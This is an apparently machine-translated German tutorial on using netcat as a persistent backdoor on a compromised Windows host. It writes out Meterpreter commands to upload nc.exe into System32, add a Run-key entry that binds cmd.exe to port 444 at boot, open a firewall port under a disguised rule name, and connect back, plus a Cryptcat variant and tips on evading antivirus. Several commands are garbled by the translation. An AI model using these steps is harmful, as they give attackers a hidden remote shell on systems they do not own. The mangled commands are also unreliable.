Kali Linux netcat persistente Agenten

Kali Linux netcat persistente Agenten
In diesem Artikel werden wir Dinge durchlaufen, die Sie mit einem Netzwerk -Dienstprogramm namens NetCat, dem Schweizer Armee -Messer von Netzwerkstools, durchführen können.

Einführung:

NetCat ist ein Netzwerkdienstprogramm, das sowohl UDP- als auch TCP -Ports lesen und schreiben kann. Es wird oft als das Schweizer Armee -Messer von Hacking -Tools bezeichnet, da es bei Hacking -Abenteuern mehrere Dinge als Client und Server tun kann. Wir werden es oft verwenden, um Binding und Reverse Shells Hood in Berichten zu erstellen, um zu sehen, was passiert, und Dateien zwischen Maschinen zu senden. Shell ist eine Möglichkeit, mit einem Computer wie einer Eingabeaufforderung unter Windows oder Terminal unter Linux interagieren zu können. Netcat ermöglicht es uns, viele Dinge wie umgekehrte Regale auszuführen, zwischen zwei oder mehr Computern zu kommunizieren, und ermöglicht es Ihnen, eine Vielzahl von Funktionen auszuführen. NetCat kann mit den einfachen Befehlsargumenten scannen und eine Verbindung zu geöffneten Ports herstellen. Es ist auch in der Lage, Dateien zu senden und eine Fernverwaltung entweder über eine direkte oder umgekehrte Shell bereitzustellen.

Netcat als persistierter Agent einsetzen:

NetCat ist ein äußerst vielseitiges und nützliches Programm. Ich habe früher in diesem Artikel erwähnt, dass es verwendet wird, um zwischen zwei Computern zu kommunizieren. Es kann auch verwendet werden, wenn Sie Persistenz installieren möchten. NetCat kann als Hintertür verwendet werden. Beginnen wir also mit der Erstellung einer anhaltenden Hülle auf dem kompromittierten System mithilfe von NETCAT. Wir werden -nc verwenden.exe, wie es der Name der ausführbaren Datei ist. Wenn Sie es jedoch umbenennen, bevor Sie es verwenden, minimiert die Erkennungschancen. Selbst nach der Umbenennung einer Antivirensoftware kann sie jedoch erkennen. Viele Hacker verändern einige der Elemente des NetCats -Quellcodes, die unnötig sind, und kompilieren Sie ihn vor der Verwendung neu. Diese Änderungen machen NetCat für Antivirensoftware unsichtbar.

Auf Kali ist NetCat in den Binaren/usr/Share/Windows-Binaren gespeichert. Verwenden Sie den Befehl aus dem Meterpreter, um es in das kompromittierte System hochzuladen:

$ MeterPreter> Upload/USR/Share/Windows-Binaries/NC.exe c: \\ windows \\ system32

Es gibt viele Filetypen in diesem Ordner, um eine Datei in einem kompromittierten System auszublenden. Es ist der beste Ort

Sie können auch ein triviales Dateiübertragungsprotokoll verwenden, wenn Sie keine Messgerätverbindung haben, um die Datei zu übertragen.

Der nächste Schritt besteht darin, die Registrierung so zu konfigurieren, dass Sie NetCat beim Start des Systems starten können, und sicherstellen, dass es Port 444 anhört. Verwenden Sie den unten angegebenen Befehl:

$ MeterPreter> Reg Setval -k HKLM \\ Software \\ Microsoft \\ Windows \\
currentVersion \\ run -vv nc -d 'c: \\ windows \\ system32 \\ nc.exe -ldp 444
-E CMD.exe '

Verwenden Sie nun den oben genannten Befehl, verwenden Sie den folgenden QueryVal -Befehl, um sicherzustellen, dass eine erfolgreiche Umsetzung der Änderung in der Registrierung.

$ MeterPreter> Reg Queryval -khklm \\ Software \\ Microsoft \\ Windows \\
currentverion \\ run -vv nc

Öffnen Sie einen Port in einer lokalen Firewall, um zu bestätigen, dass das kompromittierte System Remote -Verbindungen zu NetCAT über den Befehl $ netsh akzeptiert. Das Betriebssystem des Ziels hat die wichtigste Bedeutung. Der für Windows Vista, Windows Server 2008, verwendete Befehlszeilenkontext ist

$ netsh advfirewall

Für frühere Systeme wird der Befehl $ netsh Firewall verwendet. Geben Sie den Befehl Shell in der Eingabeaufforderung des Messgeräts ein, um den Port zur lokalen Windows -Firewall hinzuzufügen, und geben Sie die Regel mit dem geeigneten Befehl ein. Für die ordnungsgemäße Funktion des Systems wie "svchostpass Through", während Sie die Regel benennen. Ein Beispielbefehl wird wie folgt angezeigt:

$ C: \ Windows \ System32> NETSH -Firewall Hinzufügen der Portöffnung
TCP 444 "Service Pass-Through"

Um zu bestätigen, dass die Änderung erfolgreich mit dem folgenden Befehl implementiert wurde:

$ C: \ Windows \ System32> Netsh Firewall Show Port Eröffnung

Stellen Sie nach der Bestätigung der Portregel sicher, dass die Neustartoption funktioniert.

Geben Sie den folgenden Befehl aus der Eingabeaufforderung des Messgeräts ein:

$ MeterPreter> Neustart

Geben Sie den folgenden Befehl von einer interaktiven Windows -Shell ein:

$ C: \ windows \ system32> stilldown -r -t 00

Um auf kompromittierte Systeme remote zuzugreifen, geben Sie $ NC bei einer Eingabeaufforderung ein, geben Sie die Ausführlichkeit der Verbindung an (-V- und -VV meldet grundlegende Informationen, viel mehr Informationen) und geben dann die IP -Adresse des Ziels und die Portnummer ein.

$ nc -v 192.168.43.128 444

Leider hat NetCat einige Einschränkungen, nämlich keine Authentifizierung von übertragenen Daten, und die Anti-Virus-Software kann sie erkennen. Das Problem der geringeren Verschlüsselung kann jedoch durch Verwendung von Cryptcat gelöst werden, was eine Alternative zu NetCAT ist. Während der Übertragung zwischen dem ausgebeuteten Host und dem Angreifer sichern Sie Daten mithilfe der Twfish -Verschlüsselung. Es wird nicht falsch sein zu sagen, dass es einen einigermaßen starken Schutz für verschlüsselte Daten bietet.

Stellen Sie sicher, dass ein Hörer bereit ist und mit einem starken Passwort für die Verwendung von CryptCat konfiguriert ist. Verwenden Sie den folgenden Befehl:

$ sudo cryptcat -k Passwort -l -p 444

Der nächste Schritt besteht darin, Cryptcat in das gefährdete System hochzuladen und es so zu konfigurieren, dass sie mit der IP -Adresse des Listeners eine Verbindung herstellen: mit dem folgenden Befehl:

$ C: \ Cryptcat -k Passwort 444

Es ist bedauerlich zu sagen, dass Netcat und seine Varianten von Anti-Virus-Software erkannt werden können. Durch die Verwendung eines HEX -Editors, um den Quellcode von NetCat zu ändern, besteht die Möglichkeit, dass NetCat unentdeckt bleibt. Aber es ist ein langer Prozess- und Errorprozess. Ein zuverlässigerer Ansatz ist die Verwendung der Persistenzmechanismen des Metasploit -Frameworks.

Abschluss:

Netcat ist ein Schweizer Armeemesser, das zum effizienten Hacking verwendet wird. Es kann mehrere Funktionen ausführen, um auf Server und Client zugreifen zu können. Dieser Artikel enthält eine kurze Beschreibung der Sfunktion und Verwendung von NetCAT. Ich hoffe, es hat Ihnen gefallen, wenn dieser Artikel Ihnen geholfen hat, dann mit Ihren Freunden zu teilen. Fühlen Sie sich frei, nach Fragen zu fragen, die Sie in Bezug auf NetCat haben. Sie können Ihre Meinung und weitere Details auch teilen.